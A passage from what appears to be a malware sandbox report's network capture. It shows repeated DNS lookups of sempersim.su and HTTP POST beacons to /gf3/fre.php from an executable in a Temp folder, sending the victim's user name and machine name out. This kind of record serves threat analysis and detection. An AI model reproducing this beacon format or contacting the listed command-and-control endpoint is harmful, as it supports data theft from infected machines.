                        May 4, 2022 17:06:50.800946951 CEST6371253192.168.2.48.8.8.8
                        May 4, 2022 17:06:51.087764978 CEST53637128.8.8.8192.168.2.4
                        May 4, 2022 17:06:54.136918068 CEST5077853192.168.2.48.8.8.8
                        May 4, 2022 17:06:54.155487061 CEST53507788.8.8.8192.168.2.4
                        May 4, 2022 17:06:57.664119005 CEST6148653192.168.2.48.8.8.8
                        May 4, 2022 17:06:57.683183908 CEST53614868.8.8.8192.168.2.4
                        May 4, 2022 17:07:00.131350994 CEST6149753192.168.2.48.8.8.8
                        May 4, 2022 17:07:00.149154902 CEST53614978.8.8.8192.168.2.4
                        May 4, 2022 17:07:04.517652988 CEST5789053192.168.2.48.8.8.8
                        May 4, 2022 17:07:04.536412001 CEST53578908.8.8.8192.168.2.4
                        May 4, 2022 17:07:06.131412983 CEST5514253192.168.2.48.8.8.8
                        May 4, 2022 17:07:06.148112059 CEST53551428.8.8.8192.168.2.4
                        May 4, 2022 17:07:08.472306013 CEST6494853192.168.2.48.8.8.8
                        May 4, 2022 17:07:08.490387917 CEST53649488.8.8.8192.168.2.4
                        May 4, 2022 17:07:12.396862984 CEST6041853192.168.2.48.8.8.8
                        May 4, 2022 17:07:12.413196087 CEST53604188.8.8.8192.168.2.4
                        May 4, 2022 17:07:15.184930086 CEST6425953192.168.2.48.8.8.8
                        May 4, 2022 17:07:15.203217030 CEST53642598.8.8.8192.168.2.4
                        May 4, 2022 17:07:18.109793901 CEST6106853192.168.2.48.8.8.8
                        May 4, 2022 17:07:18.128374100 CEST53610688.8.8.8192.168.2.4
                        May 4, 2022 17:07:20.576478004 CEST5871553192.168.2.48.8.8.8
                        May 4, 2022 17:07:20.593101025 CEST53587158.8.8.8192.168.2.4
                        May 4, 2022 17:07:24.388511896 CEST5781653192.168.2.48.8.8.8
                        May 4, 2022 17:07:24.405092955 CEST53578168.8.8.8192.168.2.4
                        May 4, 2022 17:07:26.375874043 CEST5178753192.168.2.48.8.8.8
                        May 4, 2022 17:07:26.394052982 CEST53517878.8.8.8192.168.2.4
                        May 4, 2022 17:07:29.203284979 CEST5391653192.168.2.48.8.8.8
                        May 4, 2022 17:07:29.221874952 CEST53539168.8.8.8192.168.2.4
                        May 4, 2022 17:07:32.534837961 CEST6079053192.168.2.48.8.8.8
                        May 4, 2022 17:07:32.551269054 CEST53607908.8.8.8192.168.2.4
                        May 4, 2022 17:07:34.907866955 CEST6270853192.168.2.48.8.8.8
                        May 4, 2022 17:07:34.926085949 CEST53627088.8.8.8192.168.2.4
                        May 4, 2022 17:07:36.027148962 CEST6094653192.168.2.48.8.8.8
                        May 4, 2022 17:07:36.133327961 CEST53609468.8.8.8192.168.2.4
                        TimestampSource IPDest IPChecksumCodeType
                        May 4, 2022 17:05:56.663474083 CEST192.168.2.48.8.8.8d000(Port unreachable)Destination Unreachable
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        May 4, 2022 17:05:42.799346924 CEST192.168.2.48.8.8.80xc6aeStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:05:46.100519896 CEST192.168.2.48.8.8.80xef5fStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:05:50.113938093 CEST192.168.2.48.8.8.80x6bfaStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:05:51.787318945 CEST192.168.2.48.8.8.80x9024Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:05:53.764676094 CEST192.168.2.48.8.8.80x9202Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:05:55.553795099 CEST192.168.2.48.8.8.80xc949Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:05:56.551065922 CEST192.168.2.48.8.8.80xc949Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:05:58.351855040 CEST192.168.2.48.8.8.80x19e4Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:01.382014990 CEST192.168.2.48.8.8.80x20e9Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:03.517853975 CEST192.168.2.48.8.8.80x77c9Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:09.089375019 CEST192.168.2.48.8.8.80x40cStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:10.670600891 CEST192.168.2.48.8.8.80x6a5Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:13.256201982 CEST192.168.2.48.8.8.80x2059Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:15.851898909 CEST192.168.2.48.8.8.80xba1bStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:18.108508110 CEST192.168.2.48.8.8.80xf9a1Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:19.530814886 CEST192.168.2.48.8.8.80x5dafStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:21.093406916 CEST192.168.2.48.8.8.80x230dStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:22.836616993 CEST192.168.2.48.8.8.80x1e5aStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:27.214704037 CEST192.168.2.48.8.8.80xbc8aStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:29.050170898 CEST192.168.2.48.8.8.80x8679Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:31.242187023 CEST192.168.2.48.8.8.80x34bStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:32.814891100 CEST192.168.2.48.8.8.80x2cd0Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:34.682086945 CEST192.168.2.48.8.8.80xd7f4Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:36.219078064 CEST192.168.2.48.8.8.80x88a6Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:38.226150990 CEST192.168.2.48.8.8.80xcb91Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:40.145921946 CEST192.168.2.48.8.8.80x8a6fStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:45.966592073 CEST192.168.2.48.8.8.80x6a3bStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:47.446849108 CEST192.168.2.48.8.8.80x9757Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:50.800946951 CEST192.168.2.48.8.8.80xa712Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:54.136918068 CEST192.168.2.48.8.8.80x63e7Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:06:57.664119005 CEST192.168.2.48.8.8.80x3bfeStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:07:00.131350994 CEST192.168.2.48.8.8.80xac63Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:07:04.517652988 CEST192.168.2.48.8.8.80x2376Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:07:06.131412983 CEST192.168.2.48.8.8.80x2bb4Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:07:08.472306013 CEST192.168.2.48.8.8.80x194bStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:07:12.396862984 CEST192.168.2.48.8.8.80x3300Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:07:15.184930086 CEST192.168.2.48.8.8.80x53adStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:07:18.109793901 CEST192.168.2.48.8.8.80x2661Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:07:20.576478004 CEST192.168.2.48.8.8.80x55f1Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:07:24.388511896 CEST192.168.2.48.8.8.80x39deStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:07:26.375874043 CEST192.168.2.48.8.8.80x5e12Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:07:29.203284979 CEST192.168.2.48.8.8.80x59f0Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:07:32.534837961 CEST192.168.2.48.8.8.80xe73eStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:07:34.907866955 CEST192.168.2.48.8.8.80xf766Standard query (0)sempersim.suA (IP address)IN (0x0001)
                        May 4, 2022 17:07:36.027148962 CEST192.168.2.48.8.8.80xcd3eStandard query (0)sempersim.suA (IP address)IN (0x0001)
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        May 4, 2022 17:05:43.086805105 CEST8.8.8.8192.168.2.40xc6aeNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:05:46.213469028 CEST8.8.8.8192.168.2.40xef5fNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:05:50.132235050 CEST8.8.8.8192.168.2.40x6bfaNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:05:51.897289038 CEST8.8.8.8192.168.2.40x9024No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:05:53.782625914 CEST8.8.8.8192.168.2.40x9202No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:05:56.569468975 CEST8.8.8.8192.168.2.40xc949No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:05:56.663363934 CEST8.8.8.8192.168.2.40xc949No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:05:58.368366957 CEST8.8.8.8192.168.2.40x19e4No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:01.400378942 CEST8.8.8.8192.168.2.40x20e9No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:03.534624100 CEST8.8.8.8192.168.2.40x77c9No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:09.107700109 CEST8.8.8.8192.168.2.40x40cNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:11.001914024 CEST8.8.8.8192.168.2.40x6a5No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:13.274743080 CEST8.8.8.8192.168.2.40x2059No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:15.868463039 CEST8.8.8.8192.168.2.40xba1bNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:18.127079010 CEST8.8.8.8192.168.2.40xf9a1No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:19.549356937 CEST8.8.8.8192.168.2.40x5dafNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:21.109705925 CEST8.8.8.8192.168.2.40x230dNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:22.855032921 CEST8.8.8.8192.168.2.40x1e5aNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:27.231436968 CEST8.8.8.8192.168.2.40xbc8aNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:29.068125963 CEST8.8.8.8192.168.2.40x8679No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:31.260615110 CEST8.8.8.8192.168.2.40x34bNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:33.099653959 CEST8.8.8.8192.168.2.40x2cd0No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:34.700314999 CEST8.8.8.8192.168.2.40xd7f4No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:36.238348961 CEST8.8.8.8192.168.2.40x88a6No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:38.244344950 CEST8.8.8.8192.168.2.40xcb91No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:40.164742947 CEST8.8.8.8192.168.2.40x8a6fNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:45.984704018 CEST8.8.8.8192.168.2.40x6a3bNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:47.466262102 CEST8.8.8.8192.168.2.40x9757No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:51.087764978 CEST8.8.8.8192.168.2.40xa712No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:54.155487061 CEST8.8.8.8192.168.2.40x63e7No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:06:57.683183908 CEST8.8.8.8192.168.2.40x3bfeNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:07:00.149154902 CEST8.8.8.8192.168.2.40xac63No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:07:04.536412001 CEST8.8.8.8192.168.2.40x2376No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:07:06.148112059 CEST8.8.8.8192.168.2.40x2bb4No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:07:08.490387917 CEST8.8.8.8192.168.2.40x194bNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:07:12.413196087 CEST8.8.8.8192.168.2.40x3300No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:07:15.203217030 CEST8.8.8.8192.168.2.40x53adNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:07:18.128374100 CEST8.8.8.8192.168.2.40x2661No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:07:20.593101025 CEST8.8.8.8192.168.2.40x55f1No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:07:24.405092955 CEST8.8.8.8192.168.2.40x39deNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:07:26.394052982 CEST8.8.8.8192.168.2.40x5e12No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:07:29.221874952 CEST8.8.8.8192.168.2.40x59f0No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:07:32.551269054 CEST8.8.8.8192.168.2.40xe73eNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:07:34.926085949 CEST8.8.8.8192.168.2.40xf766No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        May 4, 2022 17:07:36.133327961 CEST8.8.8.8192.168.2.40xcd3eNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                        • sempersim.su
                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.44975888.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:05:43.139332056 CEST1040OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 190
                        Connection: close
                        May 4, 2022 17:05:43.166413069 CEST1040OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: 'ckav.rujones093954DESKTOP-716T771k08F9C4E9C79A3B52B3F739430b1mbH
                        May 4, 2022 17:05:43.679094076 CEST1040INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:19 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 15
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.44975988.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:05:46.967262983 CEST1041OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 190
                        Connection: close
                        May 4, 2022 17:05:46.996737957 CEST1041OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: 'ckav.rujones093954DESKTOP-716T771+08F9C4E9C79A3B52B3F739430PKmva
                        May 4, 2022 17:05:47.694180965 CEST1137INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:23 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 15
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        10192.168.2.44977888.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:11.039757967 CEST1386OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:11.066473961 CEST1386OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:11.460186005 CEST1386INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:47 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        11192.168.2.44977988.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:13.307202101 CEST1387OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:13.337049007 CEST1387OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:13.754757881 CEST1388INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:50 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        12192.168.2.44978088.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:15.931925058 CEST1389OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:15.959577084 CEST1389OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:16.374113083 CEST1389INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:52 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        13192.168.2.44978188.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:18.169397116 CEST1390OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:18.196454048 CEST1390OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:18.577426910 CEST1391INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:54 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        14192.168.2.44978288.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:19.592401981 CEST1391OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:19.619504929 CEST1392OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:20.073584080 CEST1392INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:56 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        15192.168.2.44978388.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:21.151210070 CEST1393OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:21.178338051 CEST1393OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:21.587323904 CEST1393INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:57 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        16192.168.2.44978488.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:22.890811920 CEST1394OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
                        May 4, 2022 17:06:22.918585062 CEST1395OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                        Data Ascii: (ckav.rujones093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                        May 4, 2022 17:06:23.295314074 CEST1395INHTTP/1.0 404 Not Found
                        Date: Wed, 04 May 2022 15:05:59 GMT
                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                        X-Powered-By: PHP/5.4.16
                        Status: 404 Not Found
                        Content-Length: 23
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        17192.168.2.44978588.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                        TimestampkBytes transferredDirectionData
                        May 4, 2022 17:06:27.338927984 CEST1396OUTPOST /gf3/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: sempersim.su
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1234DF8C
                        Content-Length: 163
                        Connection: close
